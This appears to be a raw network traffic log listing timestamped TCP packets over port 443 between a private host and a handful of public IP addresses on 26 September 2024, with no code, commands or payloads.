Sep 26, 2024 22:56:48.333058119 CEST	443	49756	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:48.333117962 CEST	49756	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:48.333125114 CEST	443	49756	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:48.333158016 CEST	443	49756	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:48.333178043 CEST	49756	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:48.333190918 CEST	49756	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:48.333194971 CEST	443	49756	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:48.333230972 CEST	49756	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:48.333328009 CEST	443	49756	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:48.333369017 CEST	49756	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:48.336030960 CEST	49756	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:48.336045027 CEST	443	49756	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:48.661439896 CEST	49757	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:48.661509991 CEST	443	49757	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:48.661596060 CEST	49757	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:48.661828041 CEST	49757	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:48.661849022 CEST	443	49757	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:49.347229004 CEST	443	49757	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:49.347328901 CEST	49757	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:49.347840071 CEST	49757	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:49.347851038 CEST	443	49757	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:49.350152969 CEST	49757	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:49.350158930 CEST	443	49757	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:49.350183010 CEST	49757	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:49.350188017 CEST	443	49757	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:49.858836889 CEST	49758	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:49.858896017 CEST	443	49758	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:49.858958960 CEST	49758	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:49.859188080 CEST	49758	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:49.859204054 CEST	443	49758	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:50.086263895 CEST	443	49757	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:50.086352110 CEST	443	49757	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:50.086472988 CEST	49757	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:50.086472988 CEST	49757	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:50.087833881 CEST	49757	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:50.087867975 CEST	443	49757	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:50.627648115 CEST	443	49758	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:50.627774954 CEST	49758	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:50.687005043 CEST	49758	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:50.687047958 CEST	443	49758	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:50.688966036 CEST	49758	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:50.688978910 CEST	443	49758	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:51.334363937 CEST	443	49758	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:51.334381104 CEST	443	49758	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:51.334430933 CEST	49758	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:51.334439039 CEST	443	49758	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:51.334460974 CEST	49758	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:51.334484100 CEST	49758	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:51.335254908 CEST	49758	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:51.335277081 CEST	443	49758	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:51.349796057 CEST	49759	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:51.349843025 CEST	443	49759	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:51.349986076 CEST	49759	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:51.350320101 CEST	49759	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:51.350331068 CEST	443	49759	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:52.000978947 CEST	443	49759	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:52.001194000 CEST	49759	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:52.001568079 CEST	49759	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:52.001579046 CEST	443	49759	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:52.003695011 CEST	49759	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:52.003700018 CEST	443	49759	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:52.720637083 CEST	443	49759	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:52.720698118 CEST	443	49759	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:52.720714092 CEST	49759	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:52.720731974 CEST	443	49759	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:52.720763922 CEST	49759	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:52.720804930 CEST	49759	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:52.720808983 CEST	443	49759	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:52.720844984 CEST	49759	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:52.720853090 CEST	443	49759	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:52.720901966 CEST	49759	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:52.721385002 CEST	49759	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:52.721402884 CEST	443	49759	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:52.788244963 CEST	49760	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:52.788269997 CEST	443	49760	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:52.788352013 CEST	49760	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:52.788562059 CEST	49760	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:52.788578033 CEST	443	49760	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:53.458796978 CEST	443	49760	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:53.458904028 CEST	49760	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:53.460212946 CEST	49760	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:53.460222006 CEST	443	49760	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:53.462021112 CEST	49760	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:53.462025881 CEST	443	49760	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:54.136696100 CEST	443	49760	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:54.136787891 CEST	443	49760	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:54.136790037 CEST	49760	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:54.136831999 CEST	49760	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:54.137871027 CEST	49760	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:54.137882948 CEST	443	49760	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:55.009397030 CEST	49762	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:55.009502888 CEST	443	49762	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:55.009643078 CEST	49762	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:55.009927034 CEST	49762	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:55.009958029 CEST	443	49762	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:55.656438112 CEST	443	49762	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:55.656522989 CEST	49762	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:55.656941891 CEST	49762	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:55.656974077 CEST	443	49762	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:55.659001112 CEST	49762	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:55.659013987 CEST	443	49762	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:55.659090996 CEST	49762	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:55.659111023 CEST	443	49762	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:55.659123898 CEST	49762	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:55.659132957 CEST	443	49762	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:55.659199953 CEST	49762	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:55.659235954 CEST	443	49762	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:55.659250975 CEST	49762	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:55.659281015 CEST	443	49762	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:55.659367085 CEST	49762	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:55.659419060 CEST	49762	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:55.659419060 CEST	49762	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:55.659598112 CEST	443	49762	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:55.659699917 CEST	49762	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:55.659729004 CEST	443	49762	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:55.659764051 CEST	49762	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:55.659785032 CEST	443	49762	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:56.991614103 CEST	443	49762	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:56.991754055 CEST	49762	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:56.991789103 CEST	443	49762	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:56.991908073 CEST	49762	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:57.056344032 CEST	49762	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:57.056410074 CEST	443	49762	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:57.061496973 CEST	49763	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:57.061551094 CEST	443	49763	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:57.061635971 CEST	49763	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:57.061841965 CEST	49763	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:57.061858892 CEST	443	49763	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:57.733262062 CEST	443	49763	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:57.733356953 CEST	49763	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:57.733886003 CEST	49763	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:57.733900070 CEST	443	49763	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:57.735727072 CEST	49763	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:57.735743046 CEST	443	49763	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:58.540568113 CEST	443	49763	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:58.540627003 CEST	49763	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:58.540649891 CEST	443	49763	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:58.540690899 CEST	49763	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:58.540815115 CEST	443	49763	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:58.540857077 CEST	49763	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:58.541084051 CEST	49763	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:56:58.541104078 CEST	443	49763	5.75.211.162	192.168.2.4
Sep 26, 2024 22:56:58.671451092 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:56:58.671503067 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:56:58.671578884 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:56:58.671878099 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:56:58.671895981 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:56:59.622956038 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:56:59.623117924 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:56:59.638823986 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:56:59.638855934 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:56:59.639791012 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:56:59.639858961 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:56:59.648825884 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:56:59.695405006 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:00.179702997 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:00.179785013 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:00.179784060 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:00.179815054 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:00.179847002 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:00.179878950 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:00.179888964 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:00.179933071 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:00.430438995 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:00.430455923 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:00.430687904 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:00.430761099 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:00.430951118 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:00.432184935 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:00.432262897 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:00.480508089 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:00.480597973 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:00.667406082 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:00.667483091 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:00.667552948 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:00.667567968 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:00.667588949 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:00.667603016 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:00.668318987 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:00.668389082 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:00.669253111 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:00.669331074 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:00.670031071 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:00.670093060 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:00.670310020 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:00.670376062 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:00.714128971 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:00.714287043 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:00.715926886 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:00.715996027 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:00.904184103 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:00.904290915 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:00.904459000 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:00.904459000 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:00.904486895 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:00.904525995 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:00.904805899 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:00.904871941 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:00.905080080 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:00.905136108 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:00.906024933 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:00.906089067 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:00.906676054 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:00.906735897 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:00.907007933 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:00.907071114 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:00.907828093 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:00.907888889 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:00.908003092 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:00.908062935 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:00.908843040 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:00.908909082 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:00.909682035 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:00.909746885 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:00.909892082 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:00.909949064 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:00.950901985 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:00.951056004 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:00.951215029 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:00.951239109 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:00.951283932 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:01.007647038 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:01.007819891 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:01.007846117 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:01.007872105 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:01.007889986 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:01.007910013 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:01.007919073 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:01.007951021 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:01.007976055 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:01.007997990 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:01.141520023 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:01.141678095 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:01.141680956 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:01.141711950 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:01.141743898 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:01.141757965 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:01.141829967 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:01.141885996 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:01.141947031 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:01.142010927 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:01.142158985 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:01.142230034 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:01.142447948 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:01.142512083 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:01.142796993 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:01.142862082 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:01.143078089 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:01.143161058 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:01.143342972 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:01.143407106 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:01.143575907 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:01.143639088 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:01.143934965 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:01.144012928 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:01.144247055 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:01.144320965 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:01.144489050 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:01.144562006 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:01.144911051 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:01.144999027 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:01.145242929 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:01.145343065 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:01.145755053 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:01.145822048 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:01.145975113 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:01.146034956 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:01.229217052 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:01.229288101 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:01.229335070 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:01.229372978 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:01.229381084 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:01.229418039 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:01.229481936 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:01.229528904 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:01.229757071 CEST	49764	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:01.229769945 CEST	443	49764	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:01.358653069 CEST	49765	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:01.358748913 CEST	443	49765	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:01.358886957 CEST	49765	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:01.359141111 CEST	49765	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:01.359168053 CEST	443	49765	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:01.670651913 CEST	49766	443	192.168.2.4	188.114.97.3
Sep 26, 2024 22:57:01.670742989 CEST	443	49766	188.114.97.3	192.168.2.4
Sep 26, 2024 22:57:01.670864105 CEST	49766	443	192.168.2.4	188.114.97.3
Sep 26, 2024 22:57:01.672291040 CEST	49766	443	192.168.2.4	188.114.97.3
Sep 26, 2024 22:57:01.672322989 CEST	443	49766	188.114.97.3	192.168.2.4
Sep 26, 2024 22:57:02.014123917 CEST	443	49765	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:02.015989065 CEST	49765	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:02.016464949 CEST	49765	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:02.016510010 CEST	443	49765	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:02.018184900 CEST	49765	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:02.018198013 CEST	443	49765	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:02.153641939 CEST	443	49766	188.114.97.3	192.168.2.4
Sep 26, 2024 22:57:02.153778076 CEST	49766	443	192.168.2.4	188.114.97.3
Sep 26, 2024 22:57:02.155373096 CEST	49766	443	192.168.2.4	188.114.97.3
Sep 26, 2024 22:57:02.155414104 CEST	443	49766	188.114.97.3	192.168.2.4
Sep 26, 2024 22:57:02.155631065 CEST	443	49766	188.114.97.3	192.168.2.4
Sep 26, 2024 22:57:02.213304043 CEST	49766	443	192.168.2.4	188.114.97.3
Sep 26, 2024 22:57:02.380872965 CEST	49766	443	192.168.2.4	188.114.97.3
Sep 26, 2024 22:57:02.381061077 CEST	49766	443	192.168.2.4	188.114.97.3
Sep 26, 2024 22:57:02.381083965 CEST	443	49766	188.114.97.3	192.168.2.4
Sep 26, 2024 22:57:02.783824921 CEST	443	49766	188.114.97.3	192.168.2.4
Sep 26, 2024 22:57:02.783902884 CEST	443	49766	188.114.97.3	192.168.2.4
Sep 26, 2024 22:57:02.783977032 CEST	49766	443	192.168.2.4	188.114.97.3
Sep 26, 2024 22:57:02.792707920 CEST	49766	443	192.168.2.4	188.114.97.3
Sep 26, 2024 22:57:02.792757988 CEST	443	49766	188.114.97.3	192.168.2.4
Sep 26, 2024 22:57:02.792787075 CEST	49766	443	192.168.2.4	188.114.97.3
Sep 26, 2024 22:57:02.792803049 CEST	443	49766	188.114.97.3	192.168.2.4
Sep 26, 2024 22:57:02.824007034 CEST	49767	443	192.168.2.4	104.21.4.136
Sep 26, 2024 22:57:02.824063063 CEST	443	49767	104.21.4.136	192.168.2.4
Sep 26, 2024 22:57:02.824147940 CEST	49767	443	192.168.2.4	104.21.4.136
Sep 26, 2024 22:57:02.824457884 CEST	49767	443	192.168.2.4	104.21.4.136
Sep 26, 2024 22:57:02.824481964 CEST	443	49767	104.21.4.136	192.168.2.4
Sep 26, 2024 22:57:02.963823080 CEST	443	49765	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:02.963995934 CEST	443	49765	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:02.964042902 CEST	49765	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:02.964123964 CEST	49765	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:02.964725971 CEST	49765	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:02.964752913 CEST	443	49765	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:02.968888044 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:02.968970060 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:02.969127893 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:02.969794989 CEST	49768	443	192.168.2.4	172.105.54.160
Sep 26, 2024 22:57:02.969829082 CEST	443	49768	172.105.54.160	192.168.2.4
Sep 26, 2024 22:57:03.290462017 CEST	443	49767	104.21.4.136	192.168.2.4
Sep 26, 2024 22:57:03.290530920 CEST	49767	443	192.168.2.4	104.21.4.136
Sep 26, 2024 22:57:03.292150974 CEST	49767	443	192.168.2.4	104.21.4.136
Sep 26, 2024 22:57:03.292170048 CEST	443	49767	104.21.4.136	192.168.2.4
Sep 26, 2024 22:57:03.292376041 CEST	443	49767	104.21.4.136	192.168.2.4
Sep 26, 2024 22:57:03.293370008 CEST	49767	443	192.168.2.4	104.21.4.136
Sep 26, 2024 22:57:03.293392897 CEST	49767	443	192.168.2.4	104.21.4.136
Sep 26, 2024 22:57:03.293431044 CEST	443	49767	104.21.4.136	192.168.2.4
